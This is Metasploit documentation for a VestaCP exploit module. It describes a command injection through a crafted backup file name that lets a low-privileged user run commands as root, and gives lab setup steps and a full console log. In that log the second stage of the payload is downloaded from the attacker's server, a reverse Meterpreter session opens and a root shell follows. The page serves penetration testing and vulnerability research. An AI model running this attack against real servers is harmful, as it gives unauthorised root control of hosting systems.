metasploit-gs/documentation/modules/exploit/linux/http/vestacp_exec.md

Vulnerable Application

This module exploits command injection vulnerability in v-list-user-backups bash script file. Low privileged authenticated users can execute arbitrary commands under the context of the root user.

An authenticated attacker with a low privileges can inject a payload in the file name starts with dot. During the user backup process, this file name will be evaluated by the v-backup-user bash scripts. As result of that backup process, when an attacker try to list existing backups injected payload will be executed.

Installing the Vulnerable Application on Ubuntu 18.03 LTS

You can install Vesta Control Panel on Ubuntu 18.04 LTS server with following commands.

ssh root@your.server
curl -O http://vestacp.com/pub/vst-install.sh
bash vst-install.sh

Once you have finished the installation, perform following actions in order to create a unprivileged user.

1- Go to https://IP_ADDR:8083/

2- Login with your administrator account.

3- Click on a "User" section under the top navigation menu. When you move your mouse over the "User" text,it will be turned to orange colour. That's link you need to click!

4 - Now you must be on https://IP_ADDR:8083/list/user/ page.

5 - Click on a green plus sign on the left side. When you move your mouse on it, it will say "ADD USER".

6 - Now you are seeing a user creation form. "user, password, email, first name, last name" fields are required. Leave package and language options as it. It does not affect on exploitation.

7 - Log out from your admin account.

8 - Go back to URL on the first step.

9 - Try to login with unprivileged user.

Verification Steps

A successful check of the exploit will look like this:

1. Start msfconsole
2. use exploit/linux/http/vestacp_exec
3. Set RHOST
4. Set LHOST
5. Set USERNAME
6. Set PASSWORD
7. Set SRVHOST
8. Set SRVPORT
9. Run exploit
10. Verify that you are seeing Successfully authenticated to the FTP service in console.
11. Verify that you are seeing Successfully uploaded the payload as a file name in console.
12. Verify that you are seeing Successfully authenticated to the HTTP Service in console.
13. Verify that you are seeing Scheduled backup has ben started. Exploitation may take up to 5 minutes. in console.
14. Verify that you are seeing It seems there is an active backup process ! Recheck after 30 second. Zzzzzz... in console.
15. Verify that you are seeing First stage is executed ! Sending 2nd stage of the payload in console.
16. Verify that you are getting meterpreter session.

Ubuntu 18.04 LTS with VestaCP 0.9.26

msf5 > use exploit/linux/http/vestacp_exec 
msf5 exploit(linux/http/vestacp_exec) > set RHOSTS 192.168.74.218
RHOSTS => 192.168.74.218
msf5 exploit(linux/http/vestacp_exec) > set USERNAME user11
USERNAME => user11
msf5 exploit(linux/http/vestacp_exec) > set PASSWORD qwe123
PASSWORD => qwe123
msf5 exploit(linux/http/vestacp_exec) > set LHOST 192.168.74.1 
LHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVHOST 192.168.74.1 
SRVHOST => 192.168.74.1
msf5 exploit(linux/http/vestacp_exec) > set SRVPORT 8081
SRVPORT => 8081
msf5 exploit(linux/http/vestacp_exec) > run
[*] Exploit running as background job 32.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 192.168.74.1:4444 
[*] 192.168.74.218:8083 - Using URL: http://192.168.74.1:8081/poSeL7s
msf5 exploit(linux/http/vestacp_exec) > [*] 192.168.74.218:8083 - Second payload download URI is http://192.168.74.1:8081/poSeL7s
[+] 192.168.74.218:21 - Successfully authenticated to the FTP service
[+] 192.168.74.218:21 - The file with the payload in the file name has been successfully uploaded.
[*] 192.168.74.218:8083 - Retrieving cookie and csrf token values
[+] 192.168.74.218:8083 - Cookie and CSRF token values successfully retrieved
[*] 192.168.74.218:8083 - Authenticating to HTTP Service with given credentials
[+] 192.168.74.218:8083 - Successfully authenticated to the HTTP Service
[*] 192.168.74.218:8083 - Starting scheduled backup. Exploitation may take up to 5 minutes.
[+] 192.168.74.218:8083 - Scheduled backup has been started ! 
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[*] 192.168.74.218:8083 - It seems there is an active backup process ! Recheck after 30 second. Zzzzzz...
[+] 192.168.74.218:8083 - First stage is executed ! Sending 2nd stage of the payload
[*] Sending stage (53755 bytes) to 192.168.74.218
[*] Meterpreter session 8 opened (192.168.74.1:4444 -> 192.168.74.218:58790) at 2020-04-11 14:35:23 +0300

msf5 exploit(linux/http/vestacp_exec) > sessions -i 8 
[*] Starting interaction with 8...

meterpreter > shell
Process 42978 created.
Channel 1 created.
/bin/sh: 0: can't access tty; job control turned off
# id
uid=0(root) gid=0(root) groups=0(root)
meterpreter > shell
[+] 192.168.74.218:8083 - It seems scheduled backup is done ..! Triggering the payload <3

#